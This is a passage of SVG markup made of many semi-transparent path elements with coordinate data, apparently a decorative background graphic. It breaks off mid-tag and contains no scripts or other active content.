d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n opacity=\"0.1\"></path>\n <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path 